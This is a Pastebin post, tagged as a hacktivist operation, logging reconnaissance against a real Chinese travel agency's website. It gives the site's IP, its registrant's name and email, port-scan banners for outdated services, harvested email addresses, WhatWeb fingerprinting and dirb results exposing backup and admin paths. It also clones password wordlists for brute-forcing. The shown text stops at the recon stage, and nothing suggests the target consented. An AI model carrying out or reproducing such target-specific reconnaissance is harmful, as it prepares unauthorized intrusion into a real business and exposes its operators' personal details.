API tools faq
paste
Advertisement
blackhat_global

#Penetration_Testing_In_The_Real_World

blackhat_global
Jan 29th, 2020 (edited)
22,286
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 268.72 KB | None | 0 0
raw download clone embed print report
  1. /$$ /$$ /$$ /$$ /$$
  2. | $$ | $$ | $$ | $$ | $$
  3. | $$$$$$$ | $$ /$$$$$$ /$$$$$$$| $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$
  4. | $$__ $$| $$ |____ $$ /$$_____/| $$ /$$/| $$__ $$ |____ $$|_ $$_/
  5. | $$ \ $$| $$ /$$$$$$$| $$ | $$$$$$/ | $$ \ $$ /$$$$$$$ | $$
  6. | $$ | $$| $$ /$$__ $$| $$ | $$_ $$ | $$ | $$ /$$__ $$ | $$ /$$
  7. | $$$$$$$/| $$| $$$$$$$| $$$$$$$| $$ \ $$| $$ | $$| $$$$$$$ | $$$$/
  8. |_______/ |__/ \_______/ \_______/|__/ \__/|__/ |__/ \_______/ \___/
  9.  
  10. #Op_Tibet #Tibet #February 2020
  11.  
  12.  
  13. PENETRATION TESTING IN THE REAL WORLD...
  14.  
  15. protonvpn-cli -connect
  16.  
  17. root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git
  18. root@blackbox:~# cd wordlist/
  19. root@blackbox:~/wordlist# ls
  20. adobe_top100_password.txt passlist.txt router_default_password.md
  21. hydra.restore rdp_passlist.txt ssh_passwd.txt
  22. pass_list.rar README.md usernames.txt
  23.  
  24. TARGET: http://www.etours.cn/
  25. IP ADDRESS: 184.154.192.250
  26.  
  27.  
  28. NSLOOKUP DNS RECORDS A, NS, MX
  29.  
  30. root@blackbox:/# nslookup
  31. > set type=A
  32. > etours.cn
  33. Server: 192.168.1.1
  34. Address: 192.168.1.1#53
  35.  
  36. Non-authoritative answer:
  37. Name: etours.cn
  38. Address: 184.154.192.250
  39.  
  40. > set type=NS
  41. > etours.cn
  42. Server: 192.168.1.1
  43. Address: 192.168.1.1#53
  44.  
  45. Non-authoritative answer:
  46. etours.cn nameserver = ns20.xincache.com.
  47. etours.cn nameserver = ns19.xincache.com.
  48.  
  49. Authoritative answers can be found from:
  50.  
  51. > set type=MX
  52. > etours.cn
  53. Server: 192.168.1.1
  54. Address: 192.168.1.1#53
  55.  
  56. Non-authoritative answer:
  57. etours.cn mail exchanger = 10 mail.etours.cn.
  58.  
  59. Authoritative answers can be found from:
  60. > exit
  61.  
  62.  
  63. DIG DNS RECORDS A, NS, MX
  64.  
  65. root@blackbox:/# dig etours.cn A
  66.  
  67. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn A
  68. ;; global options: +cmd
  69. ;; Got answer:
  70. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12778
  71. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  72.  
  73. ;; OPT PSEUDOSECTION:
  74. ; EDNS: version: 0, flags:; udp: 4096
  75. ;; QUESTION SECTION:
  76. ;etours.cn. IN A
  77.  
  78. ;; ANSWER SECTION:
  79. etours.cn. 2586 IN A 184.154.192.250
  80.  
  81. ;; Query time: 1069 msec
  82. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  83. ;; WHEN: Wed Jan 22 13:34:44 CST 2020
  84. ;; MSG SIZE rcvd: 54
  85.  
  86. root@blackbox:/# dig etours.cn NS
  87.  
  88. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn NS
  89. ;; global options: +cmd
  90. ;; Got answer:
  91. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21169
  92. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
  93.  
  94. ;; OPT PSEUDOSECTION:
  95. ; EDNS: version: 0, flags:; udp: 4096
  96. ;; QUESTION SECTION:
  97. ;etours.cn. IN NS
  98.  
  99. ;; ANSWER SECTION:
  100. etours.cn. 3506 IN NS ns19.xincache.com.
  101. etours.cn. 3506 IN NS ns20.xincache.com.
  102.  
  103. ;; Query time: 44 msec
  104. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  105. ;; WHEN: Wed Jan 22 13:35:12 CST 2020
  106. ;; MSG SIZE rcvd: 88
  107.  
  108.  
  109. root@blackbox:/# dig etours.cn MX
  110.  
  111. ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn MX
  112. ;; global options: +cmd
  113. ;; Got answer:
  114. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37222
  115. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  116.  
  117. ;; OPT PSEUDOSECTION:
  118. ; EDNS: version: 0, flags:; udp: 4096
  119. ;; QUESTION SECTION:
  120. ;etours.cn. IN MX
  121.  
  122. ;; ANSWER SECTION:
  123. etours.cn. 3520 IN MX 10 mail.etours.cn.
  124.  
  125. ;; Query time: 49 msec
  126. ;; SERVER: 192.168.1.1#53(192.168.1.1)
  127. ;; WHEN: Wed Jan 22 13:35:34 CST 2020
  128. ;; MSG SIZE rcvd: 59
  129.  
  130.  
  131. WHOIS DNSLYTICS
  132.  
  133. https://dnslytics.com/whois-lookup/etours.cn
  134.  
  135. WHOIS
  136.  
  137. root@blackbox:/opt# whois etours.cn
  138. Domain Name: etours.cn
  139. ROID: 20040108s10001s00945986-cn
  140. Domain Status: clientUpdateProhibited
  141. Domain Status: clientTransferProhibited
  142. Registrant ID: hr4iv3jdc2gd6
  143. Registrant: 李如勤
  144. Registrant Contact Email: manager@tour-beijing.com
  145. Sponsoring Registrar: 北京新网数码信息技术有限公司
  146. Name Server: ns19.xincache.com
  147. Name Server: ns20.xincache.com
  148. Registration Time: 2004-01-08 15:51:40
  149. Expiration Time: 2029-01-08 15:51:40
  150. DNSSEC: unsigned
  151.  
  152.  
  153. DMITRY IP ADDRESS
  154.  
  155. root@blackbox:/opt# dmitry -winsepfb host 184.154.192.250
  156. Deepmagic Information Gathering Tool
  157. "There be some deep magic going on"
  158.  
  159. HostIP:184.154.192.250
  160. HostName:server.etours.cn
  161.  
  162. Gathered Inet-whois information for 184.154.192.250
  163. ---------------------------------
  164.  
  165.  
  166. inetnum: 180.235.0.0 - 184.255.255.255
  167. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  168. descr: IPv4 address block not managed by the RIPE NCC
  169. remarks: ------------------------------------------------------
  170. remarks:
  171. remarks: For registration information,
  172. remarks: you can consult the following sources:
  173. remarks:
  174. remarks: IANA
  175. remarks: http://www.iana.org/assignments/ipv4-address-space
  176. remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
  177. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
  178. remarks:
  179. remarks: AFRINIC (Africa)
  180. remarks: http://www.afrinic.net/ whois.afrinic.net
  181. remarks:
  182. remarks: APNIC (Asia Pacific)
  183. remarks: http://www.apnic.net/ whois.apnic.net
  184. remarks:
  185. remarks: ARIN (Northern America)
  186. remarks: http://www.arin.net/ whois.arin.net
  187. remarks:
  188. remarks: LACNIC (Latin America and the Carribean)
  189. remarks: http://www.lacnic.net/ whois.lacnic.net
  190. remarks:
  191. remarks: ------------------------------------------------------
  192. country: EU # Country is really world wide
  193. admin-c: IANA1-RIPE
  194. tech-c: IANA1-RIPE
  195. status: ALLOCATED UNSPECIFIED
  196. mnt-by: RIPE-NCC-HM-MNT
  197. created: 2019-01-07T10:49:46Z
  198. last-modified: 2019-01-07T10:49:46Z
  199. source: RIPE
  200.  
  201. role: Internet Assigned Numbers Authority
  202. address: see http://www.iana.org.
  203. admin-c: IANA1-RIPE
  204. tech-c: IANA1-RIPE
  205. nic-hdl: IANA1-RIPE
  206. remarks: For more information on IANA services
  207. remarks: go to IANA web site at http://www.iana.org.
  208. mnt-by: RIPE-NCC-MNT
  209. created: 1970-01-01T00:00:00Z
  210. last-modified: 2001-09-22T09:31:27Z
  211. source: RIPE # Filtered
  212.  
  213. % This query was served by the RIPE Database Query Service version 1.96 (ANGUS)
  214.  
  215.  
  216.  
  217. Gathered Inic-whois information for server.etours.cn
  218. ---------------------------------
  219.  
  220. Gathered Netcraft information for server.etours.cn
  221. ---------------------------------
  222.  
  223. Retrieving Netcraft.com information for server.etours.cn
  224. Netcraft.com Information gathered
  225.  
  226. Gathered Subdomain information for server.etours.cn
  227. ---------------------------------
  228. Searching Google.com:80...
  229. Searching Altavista.com:80...
  230. Found 0 possible subdomain(s) for host server.etours.cn, Searched 0 pages containing 0 results
  231.  
  232. Gathered E-Mail information for server.etours.cn
  233. ---------------------------------
  234. Searching Google.com:80...
  235. Searching Altavista.com:80...
  236. Found 0 E-Mail(s) for host server.etours.cn, Searched 0 pages containing 0 results
  237.  
  238. Gathered TCP Port information for 184.154.192.250
  239. ---------------------------------
  240.  
  241. Port State
  242.  
  243. 21/tcp open
  244. >> 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  245.  
  246. 22/tcp open
  247. >> SSH-2.0-OpenSSH_4.3
  248.  
  249. 25/tcp open
  250. >> 220 server.etours.cn ESMTP
  251.  
  252. 53/tcp open
  253.  
  254. Portscan Finished: Scanned 150 ports, 145 ports were in state closed
  255.  
  256.  
  257. All scans completed, exiting
  258.  
  259. DMITRY DOMAIN
  260.  
  261. root@blackbox:/opt# dmitry -winsepfb host etours.cn
  262. Deepmagic Information Gathering Tool
  263. "There be some deep magic going on"
  264.  
  265. HostIP:184.154.192.250
  266. HostName:etours.cn
  267.  
  268. Gathered Inet-whois information for 184.154.192.250
  269. ---------------------------------
  270.  
  271.  
  272. inetnum: 180.235.0.0 - 184.255.255.255
  273. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  274. descr: IPv4 address block not managed by the RIPE NCC
  275. remarks: ------------------------------------------------------
  276. remarks:
  277. remarks: For registration information,
  278. remarks: you can consult the following sources:
  279. remarks:
  280. remarks: IANA
  281. remarks: http://www.iana.org/assignments/ipv4-address-space
  282. remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
  283. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
  284. remarks:
  285. remarks: AFRINIC (Africa)
  286. remarks: http://www.afrinic.net/ whois.afrinic.net
  287. remarks:
  288. remarks: APNIC (Asia Pacific)
  289. remarks: http://www.apnic.net/ whois.apnic.net
  290. remarks:
  291. remarks: ARIN (Northern America)
  292. remarks: http://www.arin.net/ whois.arin.net
  293. remarks:
  294. remarks: LACNIC (Latin America and the Carribean)
  295. remarks: http://www.lacnic.net/ whois.lacnic.net
  296. remarks:
  297. remarks: ------------------------------------------------------
  298. country: EU # Country is really world wide
  299. admin-c: IANA1-RIPE
  300. tech-c: IANA1-RIPE
  301. status: ALLOCATED UNSPECIFIED
  302. mnt-by: RIPE-NCC-HM-MNT
  303. created: 2019-01-07T10:49:46Z
  304. last-modified: 2019-01-07T10:49:46Z
  305. source: RIPE
  306.  
  307. role: Internet Assigned Numbers Authority
  308. address: see http://www.iana.org.
  309. admin-c: IANA1-RIPE
  310. tech-c: IANA1-RIPE
  311. nic-hdl: IANA1-RIPE
  312. remarks: For more information on IANA services
  313. remarks: go to IANA web site at http://www.iana.org.
  314. mnt-by: RIPE-NCC-MNT
  315. created: 1970-01-01T00:00:00Z
  316. last-modified: 2001-09-22T09:31:27Z
  317. source: RIPE # Filtered
  318.  
  319. % This query was served by the RIPE Database Query Service version 1.96 (WAGYU)
  320.  
  321.  
  322.  
  323. Gathered Inic-whois information for etours.cn
  324. ---------------------------------
  325. Domain Name: etours.cn
  326. ROID: 20040108s10001s00945986-cn
  327. Domain Status: clientUpdateProhibited
  328. Domain Status: clientTransferProhibited
  329. Registrant ID: hr4iv3jdc2gd6
  330. Registrant: 李如勤
  331. Registrant Contact Email: manager@tour-beijing.com
  332. Sponsoring Registrar: 北京新网数码信息技术有限公司
  333. Name Server: ns19.xincache.com
  334. Name Server: ns20.xincache.com
  335. Registration Time: 2004-01-08 15:51:40
  336. Expiration Time: 2029-01-08 15:51:40
  337. DNSSEC: unsigned
  338.  
  339. Gathered Netcraft information for etours.cn
  340. ---------------------------------
  341.  
  342. Retrieving Netcraft.com information for etours.cn
  343. Netcraft.com Information gathered
  344.  
  345. Gathered Subdomain information for etours.cn
  346. ---------------------------------
  347. Searching Google.com:80...
  348. HostName:www.etours.cn
  349. HostIP:184.154.192.250
  350. HostName:beijing.etours.cn
  351. HostIP:184.154.192.250
  352. Searching Altavista.com:80...
  353. Found 2 possible subdomain(s) for host etours.cn, Searched 0 pages containing 0 results
  354.  
  355. Gathered E-Mail information for etours.cn
  356. ---------------------------------
  357. Searching Google.com:80...
  358. Searching Altavista.com:80...
  359. Found 0 E-Mail(s) for host etours.cn, Searched 0 pages containing 0 results
  360.  
  361. Gathered TCP Port information for 184.154.192.250
  362. ---------------------------------
  363.  
  364. Port State
  365.  
  366. 21/tcp open
  367. >> 220 ProFTPD 1.3.3e Server (ProFTPD) [184.154.192.250]
  368.  
  369. 22/tcp open
  370. >> SSH-2.0-OpenSSH_4.3
  371.  
  372. 25/tcp open
  373. >> 220 server.etours.cn ESMTP
  374.  
  375. 53/tcp open
  376.  
  377. Portscan Finished: Scanned 150 ports, 145 ports were in state closed
  378.  
  379.  
  380. All scans completed, exiting
  381.  
  382.  
  383.  
  384. SHODAN CHECK
  385.  
  386. https://www.shodan.io/host/184.154.192.250/raw
  387.  
  388.  
  389. SEND A GET REQUEST
  390.  
  391. chrome-extension://aejoelaoggembcahagimdiliamlcdmfm/index.html
  392.  
  393. GET / HTTP/1.1
  394. Host: 184.154.192.250
  395.  
  396. HTTP/1.1 200 OK
  397. Date: Wed, 22 Jan 2020 19:57:07 GMT
  398. Server: Apache
  399. X-Powered-By: PleskLin
  400. Connection: close
  401. Transfer-Encoding: chunked
  402. Content-Type: text/html
  403.  
  404. Tel: (+86) 10 67160201 ext 1006, 1007
  405. Fax: (+86) 10 67160150 67160130
  406. Add: 2001-1-1,Linghangguoji, Guangqumen, Dongcheng Dist, Beijing, China<br>
  407. License No.L-BJ-01220
  408.  
  409.  
  410. TEST EMAIL ADDRESS
  411.  
  412. https://dnslytics.com/email-test
  413.  
  414. booking@etours.cn
  415.  
  416. Testing e-mail address: booking@etours.cn
  417. Number of mail server: 1
  418. Mail server Details Status
  419. mail.etours.cn
  420. Checking server mail.etours.cn...
  421.  
  422. Opening up socket to mail.etours.cn... Succes!
  423.  
  424. mail.etours.cn replied:
  425. HELO www.dnslytics.com
  426. (7002.86 ms)
  427. MAIL FROM: <noreply-testing@dnslytics.com>
  428. (7007.18 ms)
  429. RCPT TO: <booking@etours.cn>
  430. (7007.18 ms)
  431. QUIT
  432. (7007.12 ms)
  433. Successful communication with mail.etours.cn assuming OKsuccess
  434.  
  435.  
  436. OK success
  437. Email delivery for booking@etours.cn is successful for all mail servers!
  438.  
  439.  
  440. TRANSLATE REGISTRANT NAME:
  441.  
  442. 李如勤 = Li Ruqin
  443. manager@tour-beijing.com
  444.  
  445.  
  446. EMAIL HARVESTER
  447.  
  448. root@blackbox:/# cd /opt/
  449. root@blackbox:/opt# git clone https://github.com/laramies/theHarvester.git
  450. root@blackbox:/opt# cd theHarvester/
  451. root@blackbox:/opt/theHarvester# pip3 install -r requirements.txt
  452. root@blackbox:/opt/theHarvester# ./theHarvester.py -d etours.cn -l 500 -b all
  453.  
  454. *******************************************************************
  455. * _ _ _ *
  456. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  457. * | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  458. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  459. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  460. * *
  461. * theHarvester 3.1.1dev3 *
  462. * Coded by Christian Martorella *
  463. * Edge-Security Research *
  464. * cmartorella@edge-security.com *
  465. * *
  466. *******************************************************************
  467.  
  468.  
  469. [*] Target: etours.cn
  470.  
  471.  
  472. [*] IPs found: 14
  473. -------------------
  474. 8.5.1.33
  475. 34.212.104.30
  476. 45.204.167.102
  477. 50.63.202.16
  478. 52.84.3.40
  479. 52.84.3.100
  480. 52.84.3.239
  481. 52.84.3.252
  482. 52.84.64.42
  483. 104.27.138.30
  484. 104.27.139.30
  485. 124.16.31.152
  486. 154.222.178.247
  487. 184.154.192.250
  488.  
  489. [*] Emails found: 1
  490. ----------------------
  491. tourism@etours.cn
  492.  
  493.  
  494. https://dnslytics.com/email-test
  495.  
  496. Testing e-mail address: tourism@etours.cn
  497. Number of mail server: 1
  498. Mail server Details Status
  499. mail.etours.cn
  500. Checking server mail.etours.cn...
  501.  
  502. Opening up socket to mail.etours.cn... Succes!
  503.  
  504. mail.etours.cn replied:
  505. HELO www.dnslytics.com
  506. (7002.05 ms)
  507. MAIL FROM: <noreply-testing@dnslytics.com>
  508. (7003.72 ms)
  509. RCPT TO: <tourism@etours.cn>
  510. (7007.17 ms)
  511. QUIT
  512. (7004.80 ms)
  513. Successful communication with mail.etours.cn assuming OKsuccess
  514.  
  515.  
  516. OK success
  517. Email delivery for tourism@etours.cn is successful for all mail servers!
  518.  
  519.  
  520.  
  521. [*] Hosts found: 46
  522. ---------------------
  523. beijing.etours.cn:184.154.192.250
  524. c-domain__target--beijing.etours.cn:
  525. c-domain__target--mail.etours.cn:
  526. changdetours.cn:
  527. chinawinetours.cn:184.168.131.241
  528. dragongatetours.cn:104.27.139.30, 104.27.138.30
  529. etours.cn:184.154.192.250
  530. httpacnow.netbeijing.etours.cn:
  531. httpacnow.netwww.etours.cn:
  532. httpbeijing.etours.cn:
  533. httpsseo.5118.combeijing.etours.cn:
  534. httpswww.keyword-suggest-tool.comsearchbeijing.etours.cn:
  535. httpwww.etours.cn:
  536. mail.etours.cn:184.154.192.250
  537. seetours.cn:
  538. server.etours.cn:
  539. taketours.cn:34.212.104.30
  540. www.3etours.cn:122.10.82.47, 103.97.19.67
  541. www.beijing.etours.cn:
  542. www.dragongatetours.cn:104.27.138.30, 104.27.139.30
  543. www.etours.cn:184.154.192.250
  544. www.lovetours.cn:154.222.178.247
  545. www.seetours.cn:2.16.135.32, 2.16.135.42
  546. www.taketours.cn:34.212.104.30
  547.  
  548.  
  549. WHATRUNS 184.154.192.250
  550.  
  551. https://www.whatruns.com/website/etours.cn
  552.  
  553. Hosting Panel
  554. Plesk
  555.  
  556. Programming Language
  557. PHP 5.3.10
  558.  
  559. Web Server
  560. Apache 2.4.6
  561.  
  562.  
  563. WHATWEB
  564.  
  565. root@blackbox:~/WhatWeb# ./whatweb
  566.  
  567. .$$$ $. .$$$ $.
  568. $$$$ $$. .$$$ $$$ .$$$$$$. .$$$$$$$$$$. $$$$ $$. .$$$$$$$. .$$$$$$.
  569. $ $$ $$$ $ $$ $$$ $ $$$$$$. $$$$$ $$$$$$ $ $$ $$$ $ $$ $$ $ $$$$$$.
  570. $ `$ $$$ $ `$ $$$ $ `$ $$$ $$' $ `$ `$$ $ `$ $$$ $ `$ $ `$ $$$'
  571. $. $ $$$ $. $$$$$$ $. $$$$$$ `$ $. $ :' $. $ $$$ $. $$$$ $. $$$$$.
  572. $::$ . $$$ $::$ $$$ $::$ $$$ $::$ $::$ . $$$ $::$ $::$ $$$$
  573. $;;$ $$$ $$$ $;;$ $$$ $;;$ $$$ $;;$ $;;$ $$$ $$$ $;;$ $;;$ $$$$
  574. $$$$$$ $$$$$ $$$$ $$$ $$$$ $$$ $$$$ $$$$$$ $$$$$ $$$$$$$$$ $$$$$$$$$'
  575.  
  576.  
  577. WhatWeb - Next generation web scanner version 0.5.1.
  578. Developed by Andrew Horton (urbanadventurer) and Brendan Coles (bcoles)
  579. Homepage: https://www.morningstarsecurity.com/research/whatweb
  580.  
  581.  
  582. root@blackbox:~# git clone https://github.com/urbanadventurer/WhatWeb.git
  583.  
  584. root@blackbox:~/WhatWeb# ./whatweb -v -a 4 etours.cn
  585.  
  586. WhatWeb report for http://www.etours.cn/
  587. Status : 200 OK
  588. Title : China Travel Service, China Tours, China Travel - China eTours Travel Service
  589. IP : 184.154.192.250
  590. Country : UNITED STATES, US
  591.  
  592. Summary : Script[text/javascript], Meta-Author[www.eTours.cn], HTTPServer[Apache], JQuery[1.4.2], Plesk[Lin], Email[booking@etours.cn], Apache, X-Powered-By[PleskLin]
  593.  
  594. Detected Plugins:
  595. [ Apache ]
  596. The Apache HTTP Server Project is an effort to develop and
  597. maintain an open-source HTTP server for modern operating
  598. systems including UNIX and Windows NT. The goal of this
  599. project is to provide a secure, efficient and extensible
  600. server that provides HTTP services in sync with the current
  601. HTTP standards.
  602.  
  603. Google Dorks: (3)
  604. Website : http://httpd.apache.org/
  605.  
  606. [ Email ]
  607. Extract email addresses. Find valid email address and
  608. syntactically invalid email addresses from mailto: link
  609. tags. We match syntactically invalid links containing
  610. mailto: to catch anti-spam email addresses, eg. bob at
  611. gmail.com. This uses the simplified email regular
  612. expression from
  613. http://www.regular-expressions.info/email.html for valid
  614. email address matching.
  615.  
  616. String : booking@etours.cn
  617. String : booking@etours.cn
  618.  
  619. [ HTTPServer ]
  620. HTTP server header string. This plugin also attempts to
  621. identify the operating system from the server header.
  622.  
  623. String : Apache (from server string)
  624.  
  625. [ JQuery ]
  626. A fast, concise, JavaScript that simplifies how to traverse
  627. HTML documents, handle events, perform animations, and add
  628. AJAX.
  629.  
  630. Version : 1.4.2
  631. Website : http://jquery.com/
  632.  
  633. [ Meta-Author ]
  634. This plugin retrieves the author name from the meta name
  635. tag - info:
  636. http://www.webmarketingnow.com/tips/meta-tags-uncovered.html
  637. #author
  638.  
  639. String : www.eTours.cn
  640.  
  641. [ Plesk ]
  642. Plesk is a web control panel
  643.  
  644. String : Lin
  645. Google Dorks: (1)
  646. Website : http://www.parallels.com/products/plesk/
  647.  
  648. [ Script ]
  649. This plugin detects instances of script HTML elements and
  650. returns the script language/type.
  651.  
  652. String : text/javascript
  653.  
  654. [ X-Powered-By ]
  655. X-Powered-By HTTP header
  656.  
  657. String : PleskLin (from x-powered-by string)
  658.  
  659. HTTP Headers:
  660. HTTP/1.1 200 OK
  661. Date: Thu, 23 Jan 2020 15:47:15 GMT
  662. Server: Apache
  663. X-Powered-By: PleskLin
  664. Connection: close
  665. Transfer-Encoding: chunked
  666. Content-Type: text/html
  667.  
  668.  
  669.  
  670. root@blackbox:/opt# dirb http://184.154.192.250/ /usr/share/wordlists/dirb/common.txt
  671.  
  672. -----------------
  673. DIRB v2.22
  674. By The Dark Raver
  675. -----------------
  676.  
  677. START_TIME: Wed Jan 22 15:18:24 2020
  678. URL_BASE: http://184.154.192.250/
  679. WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
  680.  
  681.  
  682. HTTP STATUS CODES:
  683.  
  684.  
  685. https://miro.medium.com/max/1530/0*BX8QCIGzEMtRvoJN.png
  686.  
  687. CODE - STATUS
  688. 200 - OK
  689. 301 - MOVED PERMANENTLY
  690. 302 - FOUND
  691. 401 - UNAUTHORIZED
  692. 403 - FORBIDDEN
  693. 500 - Internal Server Error
  694.  
  695.  
  696. -----------------
  697.  
  698. GENERATED WORDS: 4612
  699.  
  700. ---- Scanning URL: http://184.154.192.250/ ----
  701. + http://184.154.192.250/_db_backups (CODE:401|SIZE:1211)
  702. + http://184.154.192.250/admin.pl (CODE:403|SIZE:954)
  703. + http://184.154.192.250/atom (CODE:301|SIZE:0)
  704. + http://184.154.192.250/cgi-bin/ (CODE:403|SIZE:954)
  705. + http://184.154.192.250/favicon.ico (CODE:200|SIZE:0)
  706. + http://184.154.192.250/index.php (CODE:200|SIZE:19887)
  707. + http://184.154.192.250/page1 (CODE:301|SIZE:0)
  708. + http://184.154.192.250/page2 (CODE:301|SIZE:0)
  709. + http://184.154.192.250/php.ini (CODE:200|SIZE:389)
  710. + http://184.154.192.250/plesk-stat (CODE:301|SIZE:301)
  711. + http://184.154.192.250/rdf (CODE:301|SIZE:0)
  712. + http://184.154.192.250/rss (CODE:301|SIZE:0)
  713. + http://184.154.192.250/rss2 (CODE:301|SIZE:0)
  714. + http://184.154.192.250/sitemap.xml (CODE:200|SIZE:78004)
  715. + http://184.154.192.250/usage (CODE:403|SIZE:954)
  716. + http://184.154.192.250/web.xml (CODE:200|SIZE:679)
  717. + http://184.154.192.250/webstat (CODE:301|SIZE:298)
  718.  
  719. ---- Entering directory: http://184.154.192.250/0/ ----
  720. + http://184.154.192.250/0/index.php (CODE:301|SIZE:0)
  721.  
  722. ---- Entering directory: http://184.154.192.250/2011/ ----
  723. + http://184.154.192.250/2011/13 (CODE:200|SIZE:13756)
  724. + http://184.154.192.250/2011/14 (CODE:200|SIZE:13756)
  725. + http://184.154.192.250/2011/15 (CODE:200|SIZE:13756)
  726. + http://184.154.192.250/2011/20 (CODE:200|SIZE:13756)
  727. + http://184.154.192.250/2011/21 (CODE:200|SIZE:13756)
  728. + http://184.154.192.250/2011/22 (CODE:200|SIZE:13756)
  729. + http://184.154.192.250/2011/23 (CODE:200|SIZE:13756)
  730. + http://184.154.192.250/2011/24 (CODE:200|SIZE:13756)
  731. + http://184.154.192.250/2011/25 (CODE:200|SIZE:13756)
  732. + http://184.154.192.250/2011/30 (CODE:200|SIZE:13756)
  733. + http://184.154.192.250/2011/32 (CODE:200|SIZE:13756)
  734. + http://184.154.192.250/2011/42 (CODE:200|SIZE:13756)
  735. + http://184.154.192.250/2011/50 (CODE:200|SIZE:13756)
  736. + http://184.154.192.250/2011/51 (CODE:200|SIZE:13756)
  737. + http://184.154.192.250/2011/64 (CODE:200|SIZE:13756)
  738. + http://184.154.192.250/2011/96 (CODE:200|SIZE:13756)
  739. + http://184.154.192.250/2011/atom (CODE:301|SIZE:0)
  740. + http://184.154.192.250/2011/index.php (CODE:301|SIZE:0)
  741. + http://184.154.192.250/2011/page1 (CODE:301|SIZE:0)
  742. + http://184.154.192.250/2011/page2 (CODE:301|SIZE:0)
  743. + http://184.154.192.250/2011/rdf (CODE:301|SIZE:0)
  744. + http://184.154.192.250/2011/rss (CODE:301|SIZE:0)
  745. + http://184.154.192.250/2011/rss2 (CODE:301|SIZE:0)
  746.  
  747. ---- Entering directory: http://184.154.192.250/2012/ ----
  748. + http://184.154.192.250/2012/13 (CODE:200|SIZE:13756)
  749. + http://184.154.192.250/2012/14 (CODE:200|SIZE:13756)
  750. + http://184.154.192.250/2012/15 (CODE:200|SIZE:13756)
  751. + http://184.154.192.250/2012/20 (CODE:200|SIZE:13756)
  752. + http://184.154.192.250/2012/21 (CODE:200|SIZE:13756)
  753. + http://184.154.192.250/2012/22 (CODE:200|SIZE:13756)
  754. + http://184.154.192.250/2012/23 (CODE:200|SIZE:13756)
  755. + http://184.154.192.250/2012/24 (CODE:200|SIZE:13756)
  756. + http://184.154.192.250/2012/25 (CODE:200|SIZE:13756)
  757. + http://184.154.192.250/2012/30 (CODE:200|SIZE:13756)
  758. + http://184.154.192.250/2012/32 (CODE:200|SIZE:13756)
  759. + http://184.154.192.250/2012/42 (CODE:200|SIZE:13756)
  760. + http://184.154.192.250/2012/50 (CODE:200|SIZE:13756)
  761. + http://184.154.192.250/2012/51 (CODE:200|SIZE:13756)
  762. + http://184.154.192.250/2012/64 (CODE:200|SIZE:13756)
  763. + http://184.154.192.250/2012/96 (CODE:200|SIZE:13756)
  764. + http://184.154.192.250/2012/atom (CODE:301|SIZE:0)
  765. + http://184.154.192.250/2012/index.php (CODE:301|SIZE:0)
  766. + http://184.154.192.250/2012/page1 (CODE:301|SIZE:0)
  767. + http://184.154.192.250/2012/page2 (CODE:301|SIZE:0)
  768. + http://184.154.192.250/2012/rdf (CODE:301|SIZE:0)
  769. + http://184.154.192.250/2012/rss (CODE:301|SIZE:0)
  770. + http://184.154.192.250/2012/rss2 (CODE:301|SIZE:0)
  771.  
  772. ---- Entering directory: http://184.154.192.250/about_us/ ----
  773. + http://184.154.192.250/about_us/admin.pl (CODE:403|SIZE:954)
  774. + http://184.154.192.250/about_us/index.php (CODE:200|SIZE:31320)
  775.  
  776. ---- Entering directory: http://184.154.192.250/ads/ ----
  777. + http://184.154.192.250/ads/admin.pl (CODE:403|SIZE:954)
  778. + http://184.154.192.250/ads/index.php (CODE:301|SIZE:0)
  779.  
  780. ---- Entering directory: http://184.154.192.250/backup/ ----
  781. + http://184.154.192.250/backup/admin.pl (CODE:403|SIZE:954)
  782. + http://184.154.192.250/backup/index.php (CODE:301|SIZE:0)
  783.  
  784. ---- Entering directory: http://184.154.192.250/blog/ ----
  785. + http://184.154.192.250/blog/admin (CODE:302|SIZE:0)
  786. + http://184.154.192.250/blog/admin.pl (CODE:403|SIZE:954)
  787. + http://184.154.192.250/blog/atom (CODE:301|SIZE:0)
  788. + http://184.154.192.250/blog/dashboard (CODE:302|SIZE:0)
  789. + http://184.154.192.250/blog/index.php (CODE:301|SIZE:0)
  790. + http://184.154.192.250/blog/login (CODE:302|SIZE:0)
  791. + http://184.154.192.250/blog/page1 (CODE:301|SIZE:0)
  792. + http://184.154.192.250/blog/page2 (CODE:301|SIZE:0)
  793. + http://184.154.192.250/blog/rdf (CODE:301|SIZE:0)
  794. + http://184.154.192.250/blog/rss (CODE:301|SIZE:0)
  795. + http://184.154.192.250/blog/rss2 (CODE:301|SIZE:0)
  796. + http://184.154.192.250/blog/xmlrpc.php (CODE:405|SIZE:42)
  797.  
  798. ---- Entering directory: http://184.154.192.250/Blog/ ----
  799. + http://184.154.192.250/Blog/atom (CODE:301|SIZE:0)
  800. + http://184.154.192.250/Blog/index.php (CODE:301|SIZE:0)
  801. + http://184.154.192.250/Blog/page1 (CODE:301|SIZE:0)
